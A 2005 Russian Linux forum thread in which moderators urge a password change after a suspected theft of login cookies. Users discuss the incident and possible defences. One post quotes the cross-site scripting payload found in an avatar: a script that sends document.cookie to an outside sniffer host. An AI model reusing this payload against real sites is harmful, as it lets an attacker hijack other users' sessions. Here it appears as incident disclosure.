Смена паролей (официальное объявление)

Обсуждение новостей, соответствующих тематике форума

Модератор: Модераторы разделов

Аватара пользователя
alv
Бывший модератор
Сообщения: 7275
Статус: Пенсионер в законе
ОС: Cintu

Смена паролей

Сообщение alv »

Просьба всем посетителям форума срочно сменить пароли. Причина веская, поверьте.
Спасибо сказали:
Аватара пользователя
polachok
Бывший модератор
Сообщения: 2199
Статус: главный форумный маргинал
ОС: gnu/linux

Re: Смена паролей

Сообщение polachok »

веская причина другими словами - это сперли их :)?
И немедленно выпил.
Спасибо сказали:
Аватара пользователя
alv
Бывший модератор
Сообщения: 7275
Статус: Пенсионер в законе
ОС: Cintu

Re: Смена паролей

Сообщение alv »

(polachok @ Понедельник, 30 Мая 2005, 17:01) писал(а):веская причина другими словами - это сперли их :)?

Возможно. Следствие ведут знатоки, к коим себя не причисляю.
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478

Re: Смена паролей

Сообщение Sonic »

А подробней?
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
Аватара пользователя
alv
Бывший модератор
Сообщения: 7275
Статус: Пенсионер в законе
ОС: Cintu

Re: Смена паролей

Сообщение alv »

(Sonic @ Понедельник, 30 Мая 2005, 18:43) писал(а):А подробней?

в модераторском разделе
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478

Re: Смена паролей

Сообщение Sonic »

Да дело ИМХО не в паролях, а в куках, а если так, то, хоть заменяй пароль, хоть нет. Одно и тоже будет.

А пароль ваш не узнают, это точно!
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
Аватара пользователя
VN_MAClover
Сообщения: 1233
Статус: Человек с бульвара Капуцинов

Re: Смена паролей

Сообщение VN_MAClover »

Пароли узнать могут, как-то читал про утилиты, которые позволяют это сделать. Я воспользовался добрым советом и сменил. :)
In RMS we trust.
Зачем нам Ваши окна, если LAMPочка даёт достаточно света?
Спасибо сказали:
Аватара пользователя
t.t
Бывший модератор
Сообщения: 7390
Статус: думающий о вечном
ОС: Debian, LMDE

Re: Смена паролей

Сообщение t.t »

(alv @ Понедельник, 30 Мая 2005, 17:08) писал(а):Возможно. Следствие ведут знатоки, к коим себя не причисляю.
Пока можно сказать только то, что не исключён вариант, что _некоторые_ пароли упёрли. Но на всякий случай...
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
Спасибо сказали:
Аватара пользователя
gray_graff
Сообщения: 74
ОС: ALT Linux Sisyphus

Re: Смена паролей

Сообщение gray_graff »

А я в оффлайне тот документик открывал.
Или я не о том?
Спасибо сказали:
Kit Fisto
Бывший модератор
Сообщения: 220

Re: Смена паролей

Сообщение Kit Fisto »

Не мог зайти под своим логином. Воспользовался востановлением пароля.
Спасибо сказали:
Аватара пользователя
serg_sk
Бывший модератор
Сообщения: 2749
Статус: <3 Anime
ОС: Gentoo Linux <3

Re: Смена паролей

Сообщение serg_sk »

Done.
Не ждали?! А я приперся!
Помойка Gentoo'шника
-------
Спасибо сказали:
Аватара пользователя
Xenon
Бывший модератор
Сообщения: 359
ОС: Debian

Re: Смена паролей

Сообщение Xenon »

А я картинки не видел.
Спасибо сказали:
Аватара пользователя
valeri_ufo
Бывший модератор
Сообщения: 274
Статус: Everywhere, yet nowhere

Re: Смена паролей

Сообщение valeri_ufo »

:) а я сразу же перезашёл, чтобы кукис пропал и пароль сменил, как только увидел ... так что всегда стоит обращть внимание если происходят такие дела.
Спасибо сказали:
Аватара пользователя
demongloom
Сообщения: 454
Статус: Добрый Демон

Re: Смена паролей

Сообщение demongloom »

ну мой пароль он только на лин форуме юзается. в основном юзаю qazwsx для быстрой регистрации на всяких сайтах. ну а в других нужных местах уже другой стоит :devil_2: .
Если жизнь твоя порвется, тебе новую сошьют.
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478

Re: Смена паролей

Сообщение Sonic »

Есть ещё "пипка" снизу Удалить куки
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
Аватара пользователя
Lindemidux
Сообщения: 50

Re: Смена паролей

Сообщение Lindemidux »

Я сохранил картинку аватара Linuxlamer`a.
Там был скрипт отсылки хэшей с паролями на сниффер flood3r.com/hack/sn_1/log.php
Ваши пароли даже не потребовалось бы расшифровывать, надо только Cookie создать.
Надо просто поменять Member ID
А также не использовать пароли, короче 8 символов. И желательно Буквенно-цифренные.

Lindemidux добавил в 31.05.2005 09:20

Содержимое Jpeg эксплойта:
"<script>img = new Image();
img.src = "http://flood3r.com/hack/sn_1/me.jpg?"+document.cookie;</script>"
Спасибо сказали:
Аватара пользователя
serg_sk
Бывший модератор
Сообщения: 2749
Статус: <3 Anime
ОС: Gentoo Linux <3

Re: Смена паролей

Сообщение serg_sk »

Для Lindemidux:
Тоесть? Значит порало более восьми символов, сий эксплоит не мог умыкнуть?
Не ждали?! А я приперся!
Помойка Gentoo'шника
-------
Спасибо сказали:
Аватара пользователя
TIM
Сообщения: 91
ОС: FreeBSD

Re: Смена паролей

Сообщение TIM »

ага ... а потом хэши и результаты работы Джонни вывесят где-нибудь в инете :(
(такой инцидент, не так давно, имел место быть на bsdportal.ru - мы тогда чуть одного нашего админа не потеряли ...)

Внимание!! Пожалуйста, отнеситесь серьёзнее к смене паролей - а то потом будет уже поздно !
Спасибо сказали:
Аватара пользователя
zenwolf
Бывший модератор
Сообщения: 3139
Статус: Страшный и злой
ОС: Slackware..Salix..x86_64

Re: Смена паролей

Сообщение zenwolf »

я тоже призываю к смене паролей ,это очень СЕРЬЁЗНО ,посмотрите на пос СПЕЦИАЛИСТА - TIM -а.

Ослик_Иа ,а ты чего молчишь ?
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478

Re: Смена паролей

Сообщение Sonic »

Не понял. А какая разница в длине пароля? Если он шифруется в хеш длиной 32 символа.
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
Topper
Бывший модератор
Сообщения: 2088
Статус: Насильник бабушек-педофилок
ОС: Windows 10

Re: Смена паролей

Сообщение Topper »

Для Lindemidux:
а ограничения по браузерам есть у этой баги?
Хрю.
Спасибо сказали:
Аватара пользователя
bogus
Сообщения: 160

Re: Смена паролей

Сообщение bogus »

а как IPB формирует этот хэш? Что-то мне подсказывает, что он использует не чистый пароль, а с какой-то секретной добавкой...

bogus добавил в 31.05.2005 10:56

(Sonic @ Вторник, 31 Мая 2005, 9:07) писал(а):Не понял. А какая разница в длине пароля? Если он шифруется в хеш длиной 32 символа.

Разница в том, что короткий пароль проще подобрать.

bogus добавил в 31.05.2005 11:15

А защита, кстати говоря, видимо простая: надо жестче фильтровать код для аватаров. Или вообще разрешить использовать только картинки, загруженные сюда.
Как всякое несовершенное существо я могу ошибаться. Простите меня.
jabberId = foldl (flip (:)) [] "ur.rebbaj@43sugob"
Спасибо сказали:
Topper
Бывший модератор
Сообщения: 2088
Статус: Насильник бабушек-педофилок
ОС: Windows 10

Re: Смена паролей

Сообщение Topper »

не-не-не!
тогда моя аватара накернится :devil_2:
Хрю.
Спасибо сказали:
Аватара пользователя
Lindemidux
Сообщения: 50

Re: Смена паролей

Сообщение Lindemidux »

Чтобы зайти под чужим ником надо всего лишь навсего создать Cookie с вашим хэшэм.
Длинный пароль - это чтоб его нельзя было расшифровать и использовать в других местах.
Спасибо сказали:
Аватара пользователя
clx
Сообщения: 3121
Статус: Think Different !
ОС: Mac OS X

Re: Смена паролей

Сообщение clx »

/me использует длинный пароль и не собирается его менять :P
iMac 20" Core Duo.
Спасибо сказали:
Аватара пользователя
t.t
Бывший модератор
Сообщения: 7390
Статус: думающий о вечном
ОС: Debian, LMDE

Re: Смена паролей

Сообщение t.t »

(clx @ Вторник, 31 Мая 2005, 14:49) писал(а):/me использует длинный пароль и не собирается его менять
При чём здесь длина? Если куку упёрли, то там уже готовый хеш лежит.
¡иɯʎdʞ ин ʞɐʞ 'ɐнɔɐdʞǝdu qнεиж
Спасибо сказали:
Аватара пользователя
Lindemidux
Сообщения: 50

Re: Смена паролей

Сообщение Lindemidux »

Для Bogus:
Надо все существующие аватары отконвертировать в GIF, а новичкам разрешить ставить только GIF.
Спасибо сказали:
Аватара пользователя
zenwolf
Бывший модератор
Сообщения: 3139
Статус: Страшный и злой
ОС: Slackware..Salix..x86_64

Re: Смена паролей

Сообщение zenwolf »

ой не не думайте только что написанно одним челом не может быть взломано другим .
Quae videmus quo dependet vultus. (лат) - То, что мы видим, зависит от того, куда мы смотрим.
Спасибо сказали:
Аватара пользователя
valeri_ufo
Бывший модератор
Сообщения: 274
Статус: Everywhere, yet nowhere

Re: Смена паролей

Сообщение valeri_ufo »

(Topper @ Вторник, 31 Мая 2005, 9:22) писал(а):не-не-не!
тогда моя аватара накернится  :devil_2:

а вот что важней другим, секюрити форума или ваша аватара ?
мне секюрити ...
Спасибо сказали:
Аватара пользователя
Nick S. Grechukh
Сообщения: 108

Re: Смена паролей

Сообщение Nick S. Grechukh »

(t.t @ Вторник, 31 Мая 2005, 14:57) писал(а):При чём здесь длина? Если куку упёрли, то там уже готовый хеш лежит.

что будет если в хэш еще включать ip?
ALT Linux Sisyphus 2.6.11-std26-up-alt6 KDE 3.4
В действительности все обстоит совершенно иначе, чем на самом деле...
Спасибо сказали: